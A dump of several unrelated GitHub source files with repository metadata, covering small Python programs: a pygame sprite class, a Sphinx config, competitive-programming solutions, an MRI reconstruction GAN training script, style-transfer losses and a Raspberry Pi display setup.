if(a[2]*a[2]==a[0]*a[0]+a[1]*a[1]):
print("Yes")
else:
print("No")
|
HrideshSingh/PythonPrograms
|
RightAngleTriangle.py
|
RightAngleTriangle.py
|
py
| 501 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38149030065
|
import pygame
from pygame.surface import *
from pygame.sprite import Sprite
from pygame.sprite import RenderUpdates as SpriteGroup
from pygame.sprite import spritecollide
from pygame.sprite import spritecollideany
from pygame.rect import Rect
from random import *
from config import *
from log import *
screen = None
def createFrames(image):
fr_width = image.get_height()
fr_size = fr_width, fr_width
frames = []
for frame_no in range(0, image.get_width(), fr_width):
frame = pygame.Surface(fr_size)
frame.blit(image, (0,0), ((frame_no,0), fr_size))
frame.set_colorkey(PUCE)
frames.append(frame)
return frames
def initPygame():
pygame.init()
global screen
screen = pygame.display.set_mode(RESOLUTION, FLAGS)
class Widget(Sprite):
"""Use Widget class for better movement tracking
Widget class inherits from Sprite class.
Test cases for class Widget
>>> from widget import *
>>> import pygame
>>> s = pygame.surface.Surface((30,30))
>>> w = Widget(s, (0,0,30,30), (0,0))
>>> w.rect
<rect(0, 0, 30, 30)>
>>> w.update()
>>> w.rect
<rect(0, 0, 30, 30)>
>>> w.getMovement()
[0, 0]
>>> w.setX(1)
>>> w.getX()
1
>>> w.setY(4)
>>> w.getY()
4
>>> w.setMovement((3,5))
>>> w.getMovement()
(3, 5)
>>> w.getName()
(0, 0)
>>> w.setPosition((5,7))
>>> w.getPosition()
(5, 7)
"""
def __init__(self, image, rect, name=''):
"""Instantiate a widget with a given surface,
rectangle, and (x,y) movement pair.
"""
Sprite.__init__(self)
self.movement = [0, 0]
self.rect = Rect(rect)
self.lastRect = self.rect
self.image = image
self.name = name
self.frames = []
self.frameIndex = 0
self.frameRate = 1
self.timeDelay = WIDGETFRAMES
self.lastUpdate = 0
self.world = None
self.undone = False
self.id = self.rect.top + self.rect.left +\
self.rect.width + self.rect.height
def attachToWorld(self, world):
self.world = world
self.id = self.world.curWidgetID
self.world.curWidgetID += 1
def startAnimation(self, frames, startIndex, frameRate):
self.frames = frames
self.frameIndex = startIndex
self.frameRate = frameRate
self.image = self.frames[startIndex]
self.lastUpdate = self.timeDelay
def __str__(self):
return str(self.rect.left) + str(self.rect.top) + str(self.id)
def setMovement(self, vector):
"""Set movement with a pair"""
if(self.movement != [0,0]
and vector == [0,0]):
self.world.dirtyGroup.add(self)
self.movement = vector
def getMovement(self):
"""Return movement as a pair"""
return self.movement
def setStop(self):
"""Set movement to 0"""
self.setMovement([0,0])
def setY(self, y):
"""Set y-component of movement"""
self.movement[1] = y
def setX(self, x):
"""Set x-component of movement"""
self.movement[0] = x
def getX(self):
"""Get x-component of movement"""
return self.movement[0]
def getY(self):
"""Set y-component of movement"""
return self.movement[1]
def setPosition(self, pair):
"""Set x and y coords of Widget"""
self.rect.topleft = pair
def getPosition(self):
"""Get x and y coords of Widget"""
return self.rect.topleft
def update(self):
"""Move sprite according to its movement vector"""
# Widget needs to be animated
if (len(self.frames) > 0):
if self.lastUpdate <= 0:
self.frameIndex = (self.frameIndex+1)%(len(self.frames))
self.image = self.frames[self.frameIndex]
self.lastUpdate = self.timeDelay
self.world.dirtyGroup.add(self)
else:
self.lastUpdate -= 1
elif(self.getMovement != [0,0]):
self.lastRect = Rect(self.rect)
self.rect.move_ip(self.movement)
self.world.dirtyGroup.add(self)
def undoUpdate(self):
"""Widget returns to state prior to last update()"""
self.rect = self.lastRect
def getShadow(self):
shadow = Sprite()
shadow.rect = self.lastRect.move(0,0)
return shadow
def getName(self):
"""Get name of Widget"""
return self.name
class WorldlessWidget(Widget):
def update(self):
"""Move sprite according to its movement vector"""
# Widget needs to be animated
if (len(self.frames) > 0):
if self.lastUpdate <= 0:
self.frameIndex = (self.frameIndex+1)%(len(self.frames))
self.image = self.frames[self.frameIndex]
self.lastUpdate = self.timeDelay
self.lastRect = Rect(self.rect)
self.rect.move_ip(self.movement)
|
mikedll/pybomber2
|
desktop/widget.py
|
widget.py
|
py
| 5,122 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3778986147
|
# Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
import os
import sys
project = 'Country Rank'
copyright = '2023, Giovanni Stephens'
author = 'Giovanni Stephens'
release = '1.0.0'
# The master toctree document.
master_doc = "index"
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = [
'sphinx.ext.duration',
'sphinx.ext.doctest',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
exclude_patterns = []
sys.path.insert(0, os.path.abspath('../..'))
sys.path.insert(0, os.path.abspath("_themes"))
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
add_function_parentheses = False
add_module_names = True
html_show_sourcelink = False
html_show_sphinx = False
html_sidebars = {
'**': ['globaltoc.html', 'sourcelink.html', 'searchbox.html'],
'using/windows': ['searchbox.html'],
}
|
GiovanniStephens/country-rank
|
docs/source/conf.py
|
conf.py
|
py
| 1,516 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11251886844
|
import itertools
h, w = map(int, input().split())
map_lst = []
for i in range(h):
map_lst.append(list(input()))
b_lst = [[-1] * w for i in range(h)]
b_lst[0][0] = 0
e_lst = [[0, 0]]
#be_r, be_c:調べる前の座標, r, c:調べる座標
def main(be_r, be_c, r, c, bw, cnt):
# print(r, c)
if b_lst[r][c] != -1:
return
if map_lst[be_r][be_c] == map_lst[r][c]:
b_lst[r][c] = cnt
if c < w-1: main(r, c, r, c+1, map_lst[r][c], cnt)
if r < h-1: main(r, c, r+1, c, map_lst[r][c], cnt)
else:
b_lst[r][c] = cnt + 1
e_lst.append([r, c])
cnt_b = 0
while True:
tmp_lst = e_lst
if tmp_lst == []:
break
e_lst = []
# print(tmp_lst, b_lst)
for i in tmp_lst:
r, c = i[0], i[1]
if c < w-1: main(r, c, r, c+1, map_lst[r][c], cnt_b)
if r < h-1: main(r, c, r+1, c, map_lst[r][c], cnt_b)
cnt_b += 1
for i in b_lst:
print(i)
if map_lst[0][0] == '.':
print(b_lst[-1][-1]//2)
else:
print(b_lst[-1][-1]+1//2)
|
amaguri0408/AtCoder-python
|
AGC043/a2.py
|
a2.py
|
py
| 1,058 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39634585253
|
# supervised training
import argparse
import os
import numpy as np
import math
import itertools
import datetime
import time
import sys
import torchvision.transforms as transforms
import torchvision.models as models
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
from adaptive_conv_models import *
from discriminator import *
import torch.nn as nn
import torch.nn.functional as F
import torch
from h5topng.data import transforms as T
from h5topng.common import subsample
from Vtils.pytorch_msssim_master.pytorch_msssim import MS_SSIM, gaussian_filter
from adaptive_conv_models.vtils import Random_Rotate, Random_Flip, Random_Translate
class To_h_space:
def __init__(self, mask=None, center_fractions=[0.04], accelerations=[8], seed=None):
self.mask = mask
self.seed = seed
if mask == None:
self.mask_func = subsample.MaskFunc(center_fractions, accelerations)
def __call__(self, data):
device = data.device
# to complex data (B,1,H,W,2)
data = data.unsqueeze(dim=-1).transpose(1,-1)
# to fft domian
data = T.fft2(data)
# apply mask
if self.mask == None:
data, _ = T.apply_mask(data, self.mask_func, seed=self.seed)
else:
self.mask = self.mask.to(device)
data = torch.where(self.mask == 0, torch.Tensor([0.]).to(device), data)
# to image domain
data = T.ifft2(data)
return data.transpose(1,-1).squeeze(dim=-1)
class To_k_space:
def __init__(self, mask=None, center_fractions=[0.04], accelerations=[8], seed=None):
self.mask = mask
self.seed = seed
if mask == None:
self.mask_func = subsample.MaskFunc(center_fractions, accelerations)
def __call__(self, data):
device = data.device
# to complex data (B,1,H,W,2)
data = data.unsqueeze(dim=-1).transpose(1,-1)
# to fft domian
data = T.fft2(data)
# apply mask
if self.mask == None:
data, _ = T.apply_mask(data, self.mask_func, seed=self.seed)
else:
self.mask = self.mask.to(device)
data = torch.where(self.mask == 0, torch.Tensor([0.]).to(device), data)
# to (B,2,H,W)
return data.transpose(1,-1).squeeze(dim=-1)
from utils import torch_fft, torch_ifft, sigtoimage, HLoss, normalize2d
class Soft_Data_Consistency(nn.Module):
'''mask: (B=1, C=1, H, W)'''
def __init__(self, mask):
super().__init__()
self.mask = mask
self.mask_c = torch.ones_like(mask) - mask # complementary of support
# def __call__(self, data, data_u):
def forward(self, data, data_u):
'''input: (B,2,H,W)'''
device = data.device
self.mask = self.mask.to(device)
self.mask_c = self.mask_c.to(device)
# # to complex data (B,1,H,W,2)
# data = data.unsqueeze(dim=-1).transpose(1,-1)
# data_u = data_u.unsqueeze(dim=-1).transpose(1,-1)
# # to fft domian
# data = T.fft2(data)
# data_u = T.fft2(data_u)
data = torch_fft(data)
data_u = torch_fft(data_u)
# DC operation
data_dc = data*self.mask_c + data_u*self.mask
# to image domain
data_dc = torch_ifft(data_dc)
# return data_dc.transpose(1,-1).squeeze(dim=-1)
return data_dc
parser = argparse.ArgumentParser()
parser.add_argument("--epoch", type=int, default=0, help="epoch to start training from")
parser.add_argument("--n_epochs", type=int, default=200, help="number of epochs of training")
parser.add_argument("--dataset_name", type=str, default="NYU_MRI", help="name of the dataset")
parser.add_argument('--dataroot', required=True, help='path to dataset')
parser.add_argument('--mask', default=None, help='path to dataset')
parser.add_argument("--batch_size", type=int, default=8, help="size of the batches")
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of first order momentum of gradient")
parser.add_argument("--n_cpu", type=int, default=4, help="number of cpu threads to use during batch generation")
parser.add_argument("--img_depth", type=int, default=1, help="size of image depth, e.g. coils")
parser.add_argument("--img_height", type=int, default=256, help="size of image height")
parser.add_argument("--img_width", type=int, default=256, help="size of image width")
parser.add_argument("--channels", type=int, default=2, help="number of image channels")
parser.add_argument("--repeat_dim", type=int, default=1, help="number of random samples in test")
parser.add_argument("--sample_interval", type=int, default=400, help="interval between saving generator samples")
parser.add_argument("--checkpoint_interval", type=int, default=-1, help="interval between model checkpoints")
parser.add_argument("--lambda_adv", type=float, default=1., help="pixelwise loss weight")
parser.add_argument("--lambda_pixel", type=float, default=10, help="pixelwise reconstruction loss weight")
parser.add_argument("--lambda_latent", type=float, default=0.5, help="latent loss weight")
parser.add_argument("--lambda_vgg", type=float, default=1., help="perceptual loss weight")
parser.add_argument("--lambda_grad", type=float, default=10., help="gradient penalty")
parser.add_argument("--mphn", default=False, action='store_true', help="mphn model")
parser.add_argument("--not_ML_dense", default=False, action='store_true', help="multi-level dense architecture")
parser.add_argument("--not_plus", default=False, action='store_true', help="no feature repeation to balance the model parameter size")
parser.add_argument("--dense", default=False, action='store_true', help="dense connections")
parser.add_argument("--stasm", default=False, action='store_true', help="add STASM modules")
parser.add_argument("--stasm_groups", type=int, default=1)
parser.add_argument("--data_consistency", default=False, action='store_true', help="interleaved data consistency")
opt = parser.parse_args()
# print(opt)
os.makedirs("images/%s" % opt.dataset_name, exist_ok=True)
os.makedirs("saved_models/%s" % opt.dataset_name, exist_ok=True)
cuda = True if torch.cuda.is_available() else False
input_shape = (opt.channels, opt.img_depth, opt.img_height, opt.img_width)
# mean square normalize
def mean_square_normalize(data, thresh=0.05, ratio=0.1, dilate=1.0):
data[data.abs()<thresh] = 0.0 # threshold
shape = data.shape
mean_square = (data**2).sum(1).sqrt().mean((-2,-1))
mean_square = mean_square.view((shape[0],1,1,1)).repeat((1,shape[1],shape[2],shape[3]))
# normalize
data = data/mean_square*ratio
data = torch.tanh(data*dilate)
return data
def sample_images(epoch, i):
"""Saves a generated sample rom the validation set"""
generator.eval()
# imgs = next(iter(val_dataloader))
img_samples = None
attention_samples = []
for img_A, img_B in zip(to_cyc(val_dataset.type(Tensor)), val_dataset.type(Tensor)):
# for img_A, img_B in zip(To_h_space(mask=None)(val_dataset.type(Tensor)), val_dataset.type(Tensor)):
img_A = img_A.unsqueeze(dim=0) # (1, C, H W)
img_B = img_B.unsqueeze(dim=0)
# Repeat input image by number of desired columns
repeat_dim = opt.repeat_dim
real_A = img_A.repeat(repeat_dim, 1, 1, 1)
real_A = Variable(real_A)
# Generate samples
with torch.no_grad():
fake_B, _ = generator(real_A.contiguous().unsqueeze(dim=2), zero_filled=real_A.clone(), csm=None, dc_operator=multi_coil_dc)
fake_B = fake_B.contiguous().squeeze(dim=2)
'''compute magnitude maps'''
# (B,2,H,W) to (B,2,H,W,1), B=1
img_A = img_A.unsqueeze(-1)
img_B = img_B.unsqueeze(-1)
fake_B = fake_B.unsqueeze(-1)
# to complex format (B,1,H,W,2)
img_A = img_A.transpose(1,-1)
img_B = img_B.transpose(1,-1)
fake_B = fake_B.transpose(1,-1)
# to magnitude in (B,1,H,W)
img_A = T.complex_abs(img_A)
img_B = T.complex_abs(img_B)
fake_B = T.complex_abs(fake_B)
# diff
diff = (fake_B-img_B).abs()
# Concatenate samples horisontally
fake_B = torch.cat([x for x in fake_B], -1) # (C, H, 2*N*W)
diff = torch.cat([x for x in diff], -1) # (C, H, 2*N*W)
img_sample = torch.cat((img_A.squeeze(dim=0), fake_B, img_B.squeeze(dim=0), diff), -1) # (C, H, (N+2)*W)
img_sample = img_sample.view(1, *img_sample.shape) # (1, C, H, (N+2)*W)
# Concatenate with previous samples vertically
img_samples = img_sample if img_samples is None else torch.cat([img_samples, img_sample], -2) # (1, C, M*H, (N+2)*W)
# print(img_samples.shape, img_sample.shape)
save_image(img_samples, "images/%s/Adap_GAN_epoch_%d_%d.png" % (opt.dataset_name, epoch, i), nrow=8, normalize=False)
generator.train()
# measurement method to produce real_A from real_B: (1 ,1, 1, 256, 1)
if opt.mask == None:
mask = opt.mask
else:
mask = torch.load(opt.mask)
to_cyc = To_h_space(mask=mask)
to_k = To_k_space(mask=mask)
# to_cyc = To_h_space(mask=None, center_fractions=[0.04], accelerations=[8]) # sampling pattern diversity
# to_k = To_k_space(mask=None, center_fractions=[0.04], accelerations=[8])
soft_dc = Soft_Data_Consistency(mask=mask.squeeze(dim=-1)) # DC opeerator
def multi_coil_dc(inputs, zero_filled, CSM=None):
outputs = soft_dc(inputs, zero_filled) # data consistency
return outputs
# Loss functions
# mae_loss = torch.nn.MSELoss()
mae_loss = torch.nn.L1Loss()
eps = 1e-12
Smooth_L1 = lambda output, target: torch.sqrt((output - target)**2+eps).mean()
ms_ssim = MS_SSIM(data_range=1, channel=2, K=(0.01, 0.03)) # Try a larger K2 constant (e.g. 0.4)
win = ms_ssim.win
# Initialize generator, encoder and discriminators
# generator = AdapGenerator(input_shape)
# D_VAE = RA_MultiDiscriminator([input_shape[0], *input_shape[2:]]) # as we often distinguish among single-coil views
if opt.not_ML_dense:
generator = Sequential_Dense_Network(img_shape=(2,256,256), out_channel=2, scaler_c=2, dense_dilation=False, stages=3, dense=opt.dense, no_plus = opt.not_plus)
else:
generator = Multi_Level_Dense_Network(img_shape=(2,256,256), out_channel=2, scaler_c=2, dense_dilation=False, stages=3, stasm=opt.stasm, groups=opt.stasm_groups, data_consistency=opt.data_consistency)
D_VAE = RA_MultiDiscriminator_CBAM([input_shape[0], *input_shape[2:]], p=0.1)
# D_VAE = RA_MultiDiscriminator_Unet([input_shape[0], *input_shape[2:]])
# generator = Deep_Projection_Network(input_shape, mask=mask.squeeze(dim=-1))
vgg = models.vgg11_bn(pretrained=True).features[:19].cuda()
for param in vgg.parameters():
param.requires_grad = False # no longer parameter(), but can receive and transmit gradients; it saves computational costs and memory
VGGList = nn.ModuleList()
VGGList.add_module('vgg_0', vgg[:9])
VGGList.add_module('vgg_1', vgg[9:12])
VGGList.add_module('vgg_2', vgg[12:16])
VGGList.add_module('vgg_3', vgg[16:])
from utils import Weight_init
if cuda:
generator = generator.cuda()
D_VAE = D_VAE.cuda()
mae_loss.cuda()
optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))
optimizer_D_VAE = torch.optim.Adam(D_VAE.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))
if opt.epoch != 0:
# Load pretrained models
generator.load_state_dict(torch.load("saved_models/%s/generator_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'), strict=False)
D_VAE.load_state_dict(torch.load("saved_models/%s/D_VAE_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
optimizer_G.load_state_dict(torch.load("saved_models/%s/optimizer_G_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
optimizer_D_VAE.load_state_dict(torch.load("saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
Tensor = torch.cuda.FloatTensor if cuda else torch.Tensor
# prepare dataset
dataset = torch.load(opt.dataroot) # complex MRI data (B,2,H,W)
start_ = 100
val_dataset = dataset[[10, 30, 35, 55, 75],:,start_:start_+256] # cropped validation samples, range(15,26,5)
# val_dataset = dataset[list(range(10,81,5)),:,start_:start_+256]
dataset = dataset[164:,:,list(range(start_, start_+256))] # cropped training samples
# create dataloaders for training and validation
dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True, num_workers=opt.n_cpu)
# ----------
# Training
# ----------
if __name__ == '__main__':
# Adversarial loss
valid = 1.
fake = 0.
prev_time = time.time()
for epoch in range(opt.epoch+1, opt.n_epochs+opt.epoch+1):
for i, batch in enumerate(dataloader):
'''data augmentation'''
# Runs the forward pass with autocasting.
optimizer_G.zero_grad()
# Runs the forward pass with autocasting.
with torch.cuda.amp.autocast(enabled=False):
# Set model input
real_B = Variable(batch.type(Tensor))
real_A = Variable(to_cyc(batch.type(Tensor)).detach())
real_K = Variable(to_k(batch.type(Tensor)).detach())
# Produce output using real_A
fake_B, _ = generator(real_A, zero_filled=real_A.clone(), csm=None, dc_operator=multi_coil_dc)
'''non-uniform mean'''
# Pixelwise loss of translated image by VAE
alpha = 0.64 # 0.84
# L1_loss = torch.sqrt(nn.MSELoss()(fake_B, real_B))
# L1_loss = (fake_B - real_B).abs()
L1_loss = torch.sqrt((fake_B - real_B)**2 + eps)
L1_loss = gaussian_filter(L1_loss, win.to(L1_loss.device)).mean() # Gaussian coefficients indicating the contribution
# SSIM
MS_SSIM_Loss = 1. - ms_ssim((fake_B+1.)/2, (real_B+1.)/2)
# total pixel loss
loss_pixel = (1-alpha)*L1_loss + alpha*MS_SSIM_Loss
# Adversarial loss
loss_VAE_GAN = D_VAE.compute_loss(real_B, fake_B, valid=fake, fake=valid, sg=False) # relativistic average
# loss_VAE_GAN = D_VAE.compute_loss(fake_B, None, fake=valid, sg=False)
# feature attention using a U-net-like D
loss_FA = torch.Tensor(1).fill_(0.).type(Tensor)
# loss_FA = torch.sqrt(((1.-relative_score.detach())*(fake_B - real_B))**2 + eps).mean()
# Total Loss (Generator + Encoder)
loss_GE = opt.lambda_adv*loss_VAE_GAN + opt.lambda_pixel * (loss_pixel + 0.5*loss_FA)
# ---------
# cLR-GAN
# ---------
loss_latent = opt.lambda_latent * Smooth_L1(to_k(fake_B), real_K)
# loss_latent = loss_latent.detach()
# VGG loss
content_loss = []
gram_loss = []
lambda_gram = 0.005
weight_list = [1., 1.5, 3., 4.5]
# VGG loss via vgg11_bn
real_content = sigtoimage(real_B).repeat(1,3,1,1)
fake_content = sigtoimage(fake_B).repeat(1,3,1,1)
for k, m in enumerate(VGGList):
real_content = m(real_content).detach()
fake_content = m(fake_content)
# real_vgg = norm(real_content) # instance normalize features
# fake_vgg = norm(fake_content)
real_vgg = real_content.clone()
fake_vgg = fake_content.clone()
# content_loss += [nn.L1Loss()(real_vgg, fake_vgg)]
content_loss += [Smooth_L1(real_vgg, fake_vgg)]
# content_loss += [5.*pdl_loss(real_vgg, fake_vgg, metric='charbonier', m=20)]
# gram matrices
gram_real = real_vgg.view(real_vgg.shape[0],real_vgg.shape[1],-1) @ real_vgg.view(real_vgg.shape[0],real_vgg.shape[1],-1).transpose(-2,-1)
gram_fake = fake_vgg.view(fake_vgg.shape[0],fake_vgg.shape[1],-1) @ fake_vgg.view(fake_vgg.shape[0],fake_vgg.shape[1],-1).transpose(-2,-1)
# gram_loss += [weight_list[k]*nn.L1Loss()(gram_real, gram_fake)]
gram_loss += [weight_list[k]*Smooth_L1(gram_real, gram_fake)]
loss_VGG = sum(content_loss) + lambda_gram*sum(gram_loss)
loss_VGG *= opt.lambda_vgg
loss_G = loss_GE + loss_latent + loss_VGG
# loss_G = loss_GE + loss_VGG # DC has been applied
loss_G.backward()
optimizer_G.step()
# optimizer_G_atasm.step()
# scaler_G.scale_G(loss_G).backward()
# scaler_G.step_G(optimizer_G)
# scaler_G.update()
# ----------------------------------
# Train Discriminator (cVAE-GAN)
# ----------------------------------
# if opt.epoch>0 and epoch == (opt.epoch+1) and i == 0:
# print('load optimizers here')
# print('load optimizers here')
# # Load pretrained models
# optimizer_D_VAE.load_state_dict(torch.load("saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, opt.epoch)))
# print('load optimizers here')
# print('load optimizers here')
optimizer_D_VAE.zero_grad()
clone_B = torch.ones(fake_B.shape).cuda() # avoid issues caused by .detach()
clone_B.copy_(fake_B)
# clone_B = fake_B.new_tensor(fake_B)
with torch.cuda.amp.autocast(enabled=False):
loss_D_VAE = D_VAE.compute_loss(real_B, clone_B.detach(), valid=valid, fake=fake, sg=True) # relativistic average
# loss_D_VAE = D_VAE.compute_loss(real_B, None, fake=valid, sg=False) + D_VAE.compute_loss(fake_B.detach(), None, fake=fake, sg=False)
loss_D_VAE *= opt.lambda_adv
# gradient penalty
loss_grad_VAE = 0.
loss_grad_VAE = 30.*D_VAE.compute_gradient_penalty(real_B, fake_B.detach()) # gradient penalty
loss_grad_VAE *= opt.lambda_adv
loss_D = loss_D_VAE + loss_grad_VAE
loss_D.backward()
optimizer_D_VAE.step()
# scaler_D.scale(loss_D).backward()
# scaler_D.step(optimizer_D_VAE)
# scaler_D.update()
# --------------
# Log Progress
# --------------
# Determine approximate time left
batches_done = epoch * len(dataloader) + i
batches_left = opt.n_epochs * len(dataloader) - batches_done
time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time))
prev_time = time.time()
sys.stdout.write(
"\r[E %d/%d, %d/%d] [D: (%.3f, %.3f)] [G: (%.3f), pixel: (%.3f, %.3f, %.3f), LR: %.4f vgg: (%.3f, %.3f, %.3f), (%.3f, %.3f, %.3f)] ETA: %s"
% (
epoch,
opt.n_epochs,
i,
len(dataloader),
loss_D_VAE.item(),
loss_grad_VAE,
loss_GE.item()-opt.lambda_pixel * loss_pixel.item(),
opt.lambda_pixel*(1-alpha)*L1_loss.item(),
opt.lambda_pixel*alpha*MS_SSIM_Loss.item(),
opt.lambda_pixel*0.5*loss_FA.item(),
loss_latent.item(),
opt.lambda_vgg*content_loss[0],
opt.lambda_vgg*content_loss[1],
opt.lambda_vgg*content_loss[2],
opt.lambda_vgg*lambda_gram*gram_loss[0],
opt.lambda_vgg*lambda_gram*gram_loss[1],
opt.lambda_vgg*lambda_gram*gram_loss[2],
time_left,
)
)
if batches_done % opt.sample_interval == 0:
sample_images(epoch, i)
if opt.checkpoint_interval != -1 and epoch % opt.checkpoint_interval == 0:
# Save model checkpoints
torch.save(generator.state_dict(), "saved_models/%s/generator_%d.pth" % (opt.dataset_name, epoch))
torch.save(D_VAE.state_dict(), "saved_models/%s/D_VAE_%d.pth" % (opt.dataset_name, epoch))
torch.save(optimizer_G.state_dict(), "saved_models/%s/optimizer_G_%d.pth" % (opt.dataset_name, epoch))
torch.save(optimizer_D_VAE.state_dict(), "saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, epoch))
# torch.save(optimizer_G_atasm.state_dict(), "saved_models/%s/optimizer_G_atasm_%d.pth" % (opt.dataset_name, epoch))
|
JingshuaiLiu/HFMRI
|
single_coil_dense_network.py
|
single_coil_dense_network.py
|
py
| 21,183 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22779572502
|
from collections import deque
vowels = deque(x for x in input().split())
consonants = [x for x in input().split()]
flowers = {
"rose": [],
"tulip": [],
"lotus": [],
"daffodil": []
}
def check_for_a_match():
for word, found in flowers.items():
if len(found) == len(word):
return word
while vowels and consonants:
current_vowel = vowels.popleft()
current_consonant = consonants.pop()
for flower in flowers.keys():
if current_vowel in flower and current_vowel not in flowers[flower]:
flowers[flower].extend(current_vowel * (flower.count(current_vowel)))
if current_consonant in flower and current_consonant not in flowers[flower]:
flowers[flower].extend(current_consonant * (flower.count(current_consonant)))
result = check_for_a_match()
if result:
print(f"Word found: {result}")
break
else:
print("Cannot find any word!")
if vowels:
print(f"Vowels left: {' '.join(vowels)}")
if consonants:
print(f"Consonants left: {' '.join(consonants)}")
|
DanieII/SoftUni-Advanced-2023-01
|
advanced/exam_practice/flower_finder.py
|
flower_finder.py
|
py
| 1,076 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28395227304
|
import torch
import torch.nn as nn
class ContentLoss(nn.Module):
def __init__(self, target):
super(ContentLoss, self).__init__()
# 必须要用detach来分离出target,否则会计算目标值的梯度
self.target = target.detach()
self.criterion = nn.MSELoss()
def forward(self, inputs):
self.loss = self.criterion(inputs, self.target)
return inputs
class StyleLoss(nn.Module):
def __init__(self, target):
super(StyleLoss, self).__init__()
self.gram = GramMatrix()
self.target = self.gram(target).detach()
self.criterion = nn.MSELoss()
def forward(self, inputs):
self.G = self.gram(inputs)
self.loss = self.criterion(self.G, self.target)
return inputs
class GramMatrix(nn.Module):
def forward(self, inputs):
a, b, c, d = inputs.size()
features = inputs.view(a * b, c * d)
G = torch.mm(features, features.t())
return G.div(a * b * c * d)
|
cwpeng-cn/style-transfer
|
losses.py
|
losses.py
|
py
| 1,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22814997152
|
# s1 = '1234' when s2 = '1234', '2341', '3412' or '4123', return True, else return False
# 1. s = s1 + s1 ('12341234')
# 2. KMP s with s2
def kmp_get_next(p):
p_len = len(p)
next_arr = [0] * p_len
next_arr[0] = -1
k = -1
i = 0
while i < p_len-1:
if k == -1 or p[k] == p[i]:
k += 1
i += 1
next_arr[i] = k
else:
k = next_arr[k]
return next_arr
def kmp(s, p):
next_arr = kmp_get_next(p)
i = 0
j = 0
while i < len(s):
if j == -1 or s[i] == p[j]:
i += 1
j += 1
else:
j = next_arr[j]
if j == len(p):
return True
return False
def is_rev_word(s1, s2):
if len(s1) != len(s2):
return False
s = s1 + s1
return kmp(s, s2)
print(is_rev_word('1234', '3241'))
|
solaaa/alg_exercise
|
is_reversecd_word.py
|
is_reversecd_word.py
|
py
| 905 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71270411708
|
"""
This question is asked by Amazon. Given a non-empty linked list,
return the middle node of the list. If the linked list contains
an even number of elements, return the node closer to the end.
Ex: Given the following linked lists...
1->2->3->null, return 2
1->2->3->4->null, return 3
1->null, return 1
"""
class ListNode:
def __init__(self, value=None):
self.data = value
self.next = None
def __str__(self) -> str:
llString = ""
currNode = self
while currNode:
llString += (str(currNode.data)+"->")
currNode = currNode.next
llString += "null"
return llString
def findMiddleElement(head: ListNode) -> int:
# Time: O(n)
# Space: O(1)
if not head: return -1
slow = fast = head
while fast and fast.next:
slow = slow.next
fast = fast.next.next
return slow.data
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
assert findMiddleElement(l1) == 2
l2 = ListNode(1)
l2.next = ListNode(2)
l2.next.next = ListNode(3)
l2.next.next.next = ListNode(4)
assert findMiddleElement(l2) == 3
l3 = ListNode(1)
assert findMiddleElement(l3) == 1
print("Passed all tests!")
|
lucasbivar/coding-interviews
|
the-daily-byte/week_03/day_18_find_middle_element.py
|
day_18_find_middle_element.py
|
py
| 1,161 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38902423747
|
import time
import subprocess
import digitalio
import board
from PIL import Image, ImageDraw, ImageFont
import adafruit_rgb_display.st7789 as st7789
import pynmea2
import sys
from subprocess import Popen, PIPE
import serial
import io
# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):
cs_pin = digitalio.DigitalInOut(board.CE0)
dc_pin = digitalio.DigitalInOut(board.D25)
reset_pin = None
# COLORS
ORGANGE = "#ffa600"
WHITE = "#FFFFFF"
# Config for display baudrate (default max is 24mhz):
BAUDRATE = 64000000
# Setup SPI bus using hardware SPI:
spi = board.SPI()
# Create the ST7789 display:
disp = st7789.ST7789(
spi,
cs=cs_pin,
dc=dc_pin,
rst=reset_pin,
baudrate=BAUDRATE,
width=135,
height=240,
x_offset=53,
y_offset=40,
)
# Create blank image for drawing.
# Make sure to create image with mode 'RGB' for full color.
height = disp.width # we swap height/width to rotate it to landscape!
width = disp.height
image = Image.new("RGB", (width, height))
rotation = 90
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))
disp.image(image, rotation)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = -2
top = padding
bottom = height - padding
# Move left to right keeping track of the current x position for drawing shapes.
x = 0
# Alternatively load a TTF font. Make sure the .ttf font file is in the
# same directory as the python script!
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
font = ImageFont.truetype("/usr/share/fonts/truetype/noto/NotoMono-Regular.ttf", 24)
# Turn on the backlight
